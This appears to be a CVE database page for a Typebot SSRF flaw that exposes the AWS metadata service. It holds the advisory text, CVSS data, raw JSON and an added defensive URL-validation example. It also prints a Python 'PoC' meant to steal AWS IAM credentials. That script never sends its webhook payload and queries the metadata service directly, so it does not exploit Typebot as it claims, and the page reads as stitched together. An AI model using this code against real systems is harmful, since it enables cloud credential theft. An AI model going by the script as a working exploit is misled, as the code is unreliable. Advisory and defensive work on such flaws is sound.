Security Vulnerability Report
CVE-2025-64709 CVSS 9.6 CRITICAL

CVE-2025-64709

Published: 2025-11-13 20:15:53
Last Modified: 2026-01-30 14:23:43

Description

Typebot is an open-source chatbot builder. In versions prior to 3.13.1, a Server-Side Request Forgery (SSRF) vulnerability in the Typebot webhook block (HTTP Request component) functionality allows authenticated users to make arbitrary HTTP requests from the server, including access to AWS Instance Metadata Service (IMDS). By bypassing IMDSv2 protection through custom header injection, attackers can extract temporary AWS IAM credentials for the EKS node role, leading to complete compromise of the Kubernetes cluster and associated AWS infrastructure. Version 3.13.1 fixes the issue.
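The two controls whose absence the description implies, as an added defensive example (not Typebot's code; the function names, the header deny-list and the sample URLs are assumptions): a static destination check that rejects the IMDS and other internal addresses, and a header filter that keeps user-supplied IMDSv2 token headers out of the outbound request.

```python
"""Defensive webhook-destination check: an added example, not Typebot's code.
Rejects the AWS IMDS (169.254.169.254, fd00:ec2::254) and other internal
destinations, and user headers that could negotiate an IMDSv2 token."""
import ipaddress
import socket
from urllib.parse import urlsplit

# Header prefixes a webhook author must never control (case-insensitive);
# X-aws-ec2-metadata-token-ttl-seconds is the header named in the description.
FORBIDDEN_HEADER_PREFIXES = ("x-aws-ec2-metadata-token",)


def _to_ip(host):
    """ip_address for literal hosts, else None. Also catches legacy numeric
    forms ('2852039166', '0xA9FEA9FE', '0251.254.169.254') that resolvers
    accept as 169.254.169.254, via the platform inet_aton."""
    try:
        return ipaddress.ip_address(host)
    except ValueError:
        pass
    try:
        return ipaddress.ip_address(socket.inet_aton(host))
    except OSError:
        return None


def is_blocked_address(ip):
    """True for loopback, link-local (IMDS), private/ULA, reserved, unspecified."""
    if isinstance(ip, ipaddress.IPv6Address) and ip.ipv4_mapped:
        ip = ip.ipv4_mapped  # judge ::ffff:169.254.169.254 as its IPv4 form
    return (ip.is_private or ip.is_loopback or ip.is_link_local
            or ip.is_reserved or ip.is_multicast or ip.is_unspecified)


def validate_webhook(url, headers):
    """Return (allowed, reason) for a user-configured webhook request."""
    parts = urlsplit(url)
    if parts.scheme not in ("http", "https"):
        return False, f"scheme {parts.scheme!r} not allowed"
    host = (parts.hostname or "").lower()
    if not host or host == "localhost" or host.endswith(".localhost"):
        return False, "loopback hostname"
    ip = _to_ip(host)
    if ip is not None and is_blocked_address(ip):
        return False, f"destination {ip} is an internal address"
    for name in headers:
        if name.lower().startswith(FORBIDDEN_HEADER_PREFIXES):
            return False, f"header {name!r} is reserved"
    return True, "ok"
```

Hostnames are deliberately not resolved here; a production filter must also resolve the name and apply is_blocked_address to every returned address at connect time, otherwise a name that later resolves to 169.254.169.254 sidesteps the static check.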

CVSS Details

CVSS Score
9.6
Severity
CRITICAL
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:N

Configurations (Affected Products)

cpe:2.3:a:typebot:typebot:*:*:*:*:*:-:*:* - VULNERABLE
Typebot < 3.13.1

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
#!/usr/bin/env python3
"""
CVE-2025-64709 PoC - Typebot SSRF to AWS IMDS Credential Theft
Note: This is for authorized security testing only
"""
import requests
import json

# Unused in this script; kept as published.
TARGET_URL = "http://target-typebot-instance.com"
WORKSPACE_ID = "your-workspace-id"


def exploit_ssrf():
    """Exploit SSRF to steal AWS credentials via IMDSv2 bypass"""
    # Step 1: Create webhook block payload with SSRF
    # Note: this payload is constructed but never sent; the requests below are
    # issued directly from the host running the script, not via the webhook block.
    webhook_payload = {
        "type": "webhook",
        "options": {
            "url": "http://169.254.169.254/latest/api/token",
            "method": "PUT",
            "headers": {
                "X-aws-ec2-metadata-token-ttl-seconds": "21600"
            }
        }
    }

    # Step 2: Get IMDSv2 token
    token_response = requests.put(
        "http://169.254.169.254/latest/api/token",
        headers={"X-aws-ec2-metadata-token-ttl-seconds": "21600"},
        timeout=5
    )
    imds_token = token_response.text

    # Step 3: Request IAM credentials
    credentials_url = "http://169.254.169.254/latest/meta-data/iam/security-credentials/"
    cred_response = requests.get(
        credentials_url,
        headers={"X-aws-ec2-metadata-token": imds_token},
        timeout=5
    )

    # Step 4: Parse and extract AWS credentials
    role_name = cred_response.text.strip()
    final_url = f"http://169.254.169.254/latest/meta-data/iam/security-credentials/{role_name}"
    aws_creds = requests.get(
        final_url,
        headers={"X-aws-ec2-metadata-token": imds_token},
        timeout=5
    ).json()

    print("[+] Stolen AWS Credentials:")
    print(f"    AccessKeyId: {aws_creds.get('AccessKeyId')}")
    print(f"    SecretAccessKey: {aws_creds.get('SecretAccessKey')}")
    print(f"    Token: {aws_creds.get('Token')}")
    return aws_creds


if __name__ == "__main__":
    print("[*] CVE-2025-64709 Typebot SSRF Exploit")
    print("[*] Target: Steal AWS IMDS credentials via webhook")
    exploit_ssrf()

References

https://github.com/baptisteArno/typebot.io/security/advisories/GHSA-8gq9-rw7v-3jpr - Exploit, Mitigation, Vendor Advisory

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-64709", "sourceIdentifier": "[email protected]", "published": "2025-11-13T20:15:53.053", "lastModified": "2026-01-30T14:23:42.560", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Typebot is an open-source chatbot builder. In versions prior to 3.13.1, a Server-Side Request Forgery (SSRF) vulnerability in the Typebot webhook block (HTTP Request component) functionality allows authenticated users to make arbitrary HTTP requests from the server, including access to AWS Instance Metadata Service (IMDS). By bypassing IMDSv2 protection through custom header injection, attackers can extract temporary AWS IAM credentials for the EKS node role, leading to complete compromise of the Kubernetes cluster and associated AWS infrastructure. Version 3.13.1 fixes the issue."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:N", "baseScore": 9.6, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "CHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.1, "impactScore": 5.8}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H", "baseScore": 9.9, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "CHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.1, "impactScore": 6.0}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-918"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": 
[{"vulnerable": true, "criteria": "cpe:2.3:a:typebot:typebot:*:*:*:*:*:-:*:*", "versionEndExcluding": "3.13.1", "matchCriteriaId": "C3C6D327-65E0-402A-AA2C-7879B7C472E4"}]}]}], "references": [{"url": "https://github.com/baptisteArno/typebot.io/security/advisories/GHSA-8gq9-rw7v-3jpr", "source": "[email protected]", "tags": ["Exploit", "Mitigation", "Vendor Advisory"]}]}}